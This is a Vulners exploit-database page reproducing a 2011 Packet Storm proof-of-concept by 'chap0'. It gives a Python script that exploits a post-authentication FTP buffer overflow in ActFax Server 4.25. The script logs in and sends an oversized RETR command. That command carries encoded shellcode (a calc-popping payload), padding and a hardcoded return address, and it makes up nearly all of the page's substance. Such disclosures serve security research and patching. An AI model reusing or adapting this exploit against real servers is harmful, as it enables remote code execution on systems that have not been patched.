Lucene search
+L

ActFax Server 4.25 FTP Buffer Overflow

🗓️ 16 Feb 2011 00:00:00Reported by chap0Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

ActFax Server 4.25 FTP Buffer Overflow exploi

Code
`#!/usr/bin/python  
# Exploit Title: ActFax Server FTP Remote BOF (post auth)  
# Date: Feb 15, 2011  
# Author: chap0  
# Software Link: http://www.actfax.com/download/actfax_setup_en.exe  
# Version: Version 4.25, Build 0221 (2010-02-11)  
# Tested on: Windows XP SP3 en  
# Big thanks to Sud0 - and an extra greetz to mr_me -RESPECT  
# Stay true my friends  
  
import socket  
  
print "\nActFax Server FTP Remote BOF"  
print " chap0 - www.seek-truth.net \n"  
  
# pops calc  
calccode = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkXlqELKZL587Pep7PdoaxsSSQbLPcLMw5JXbpX8KwOcHBPwkON0A"  
  
# push ebp #pop eax #sub eax,55555521 * 3 :)  
junk = "\x55\x58\x2D\x21\x55\x55\x55\x2D\x21\x55\x55\x55\x2D\x21\x55\x55\x55" + "C"*135 + calccode + "A"*(616-len(calccode))  
  
payload = junk + "\x37\x27\x40\x00" #RETN  
  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
connect=s.connect(('192.168.1.2',21))  
s.recv(1024)  
s.send('USER ' + 'chapo\r\n')  
print (s.recv(1024))  
s.send('PASS chapo\r\n')  
print (s.recv(1024))  
s.send('RETR ' + payload + '\r\n')  
s.close  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2011 00:00Current
0.8Low risk
Vulners AI Score0.8
23